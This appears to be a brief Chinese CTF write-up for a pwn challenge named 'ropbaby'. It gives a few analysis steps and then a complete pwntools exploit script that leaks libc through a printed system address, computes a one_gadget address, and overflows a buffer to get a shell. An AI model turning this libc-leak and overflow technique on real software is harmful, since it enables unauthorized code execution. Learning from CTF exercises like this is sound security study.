- 分析
1.先查看文件位数,安全机制
2.查看strings,调用函数(特别注意常见的函数) - 漏洞点
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190526142752673.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190526142650416.png)
- EXP
from pwn import *
context.log_level = "debug"
p = process('./ropbaby')
p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
a=p.recvline()
libc = a.split(': ')[-1]
lib=int(libc,16) - 0x45390
log.success('libc : %#x',lib)
onegadget =0x45216+lib
p.recvuntil(': ')
p.sendline('3')
p.recvuntil('(max 1024): ')
p.sendline('17')
p.sendline('a'*8 + p64(onegadget))
p.recvuntil(': ')
p.sendline('4') #让题目正常退出
p.interactive()